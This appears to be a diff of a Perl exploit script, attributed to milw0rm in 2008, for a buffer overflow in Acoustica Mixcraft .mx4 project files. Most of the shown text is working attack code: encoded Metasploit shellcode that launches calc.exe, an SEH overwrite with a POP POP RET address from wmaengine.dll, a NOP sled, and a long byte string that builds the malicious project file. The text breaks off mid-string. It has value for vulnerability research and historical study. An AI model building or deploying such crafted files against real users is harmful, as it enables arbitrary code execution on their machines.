"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF0\x3F\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4C\x49\x53\x54". - "\x04\x00\x00\x00\x45\x66\x78\x4C\x4D\x61\x72\x6B\x98\x01\x00\x00\x00\x00\x00\x00". - "\x00\x00\xF0\x3F\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x53\x74\x61\x72\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\x80\x00". - "\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x5E\x40". - "\x03\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00\x01\x01\x01\x00\x00\x00\x00\x00". - "\x00\x00\xF0\x3F\x54\x72\x6B\x41\x98\x03\x00\x00\x00\x00\x00\x00\x00\x00\xF0\x3F". - "\x54\x72\x61\x63\x6B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "$buff". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\xF0\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\x00\x00". 
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x01\x00\x00\x46\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4C\x49\x53\x54\x04\x00\x00\x00". - "\x45\x66\x78\x4C"; - -open (MYFILE, '>>Exploit.mx4'); -binmode(MYFILE); -print MYFILE "$tuff"; -close (MYFILE); -print "Exploit file has been created. 
( Exploit.mx4 )\n";
-
-# milw0rm.com [2008-08-28]
+#!/usr/bin/perl
+#
+# Acoustica Mixcraft (mx4 file) Local Buffer Overflow Exploit
+# Author: Koshi
+#
+# Date: 08-28-08 ( 0day )
+# Application: Acoustica Mixcraft
+# Version(s): (Possibly Older) / 4.1 Build 96 / 4.2 Build 98
+# Site: http://acoustica.com/mixcraft/download.htm
+# Tested On: Windows XP SP3 Fully Patched
+#
+# A vulnerability exists in an unchecked buffer located in the
+# project files (.mx4) for Acoustica Mixcraft4. The buffer should
+# contain the file name of an image located in
+# "C:\Program Files\Acoustica Mixcraft 4\mixrez\icons" on a default
+# install of Mixcraft, and would be used as the icon for a specific
+# "track" or "instrument" in Mixcraft.
+#
+# gr33tz: Rima my baby, str0ke, breaker_unit, mess', and my dude who
+# showed me this nifty program.
+#
+
+
+# win32_exec - EXITFUNC=process CMD=calc.exe Size=165 Encoder=ShikataGaNai http://metasploit.com
+my $shellcode =
+"\xdd\xc3\xd9\x74\x24\xf4\x5b\x29\xc9\xb8\x1f\xb4\xe6\x18\xb1\x24".
+"\x83\xeb\xfc\x31\x43\x13\x03\x5c\xa7\x04\xed\x9e\x2f\x8c\x0e\x5e".
+"\xb0\x86\x4a\x62\x3b\xe4\x51\xe2\x3a\xfa\xd1\x5d\x25\x8f\xb9\x41".
+"\x54\x64\x0c\x0a\x62\xf1\x8e\xe2\xba\xc5\x08\x56\x38\x05\x5e\xa1".
+"\x80\x4c\x92\xac\xc0\xba\x59\x95\x90\x18\xa6\x9c\xfd\xea\xf9\x7a".
+"\xff\x07\x63\x09\xf3\x9c\xe7\x52\x10\x22\x13\xe7\x34\xaf\xe2\x1c".
+"\xcd\xf3\xc0\xe6\x0d\x3a\xc9\x82\x1a\x7d\xf9\xcf\xdd\x06\xf5\x44".
+"\x9d\xfa\x8e\x2a\x02\xae\x1a\xa2\x32\x5b\x15\xb9\xc3\x2b\x26\xbd".
+"\xc3\xc0\x4f\x81\x9c\xe7\x79\x99\x74\x81\x7e\xda\xb9\xea\x2e\xb4".
+"\x47\xd5\x2d\x37\xd0\x7d\x4f\x3d\x2e\x29\x4f\xa6\x4c\xb4\xc3\x4b".
+"\xbd\x53\x64\xee\xc1";
+
+my $bof = "A"x324;
+my $sled = "\x90"x35;
+my $fill = "\x90"x468;
+my $buff = "".
+ "$bof".
+ "\xeb\x06\x90\x90". ### Pointer to next SEH record (Boing!) ###
+ "\x28\x12\x8b\x01". ### SE handler 0x018b1228 ( wmaengine.dll POP POP RET ) ###
+ "$sled".
+ "$shellcode".
+ "$fill";
+
+my $tuff = "".
+ "\x52\x49\x46\x46\xC4\x0F\x00\x00\x4D\x58\x43\x33\x50\x52\x4F\x4A\x60\x0A\x00\x00". + "\xCD\xCC\xCC\xCC\xCC\xCC\xF4\x3F\x43\x3A\x5C\x44\x6F\x63\x75\x6D\x65\x6E\x74\x73". + "\x20\x61\x6E\x64\x20\x53\x65\x74\x74\x69\x6E\x67\x73\x5C\x4F\x77\x6E\x65\x72\x5C". + "\x4D\x79\x20\x44\x6F\x63\x75\x6D\x65\x6E\x74\x73\x5C\x4D\x79\x20\x52\x65\x63\x6F". + "\x72\x64\x69\x6E\x67\x73\x5C\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF0\x3F\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4C\x49\x53\x54". + "\x04\x00\x00\x00\x45\x66\x78\x4C\x4D\x61\x72\x6B\x98\x01\x00\x00\x00\x00\x00\x00". + "\x00\x00\xF0\x3F\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + 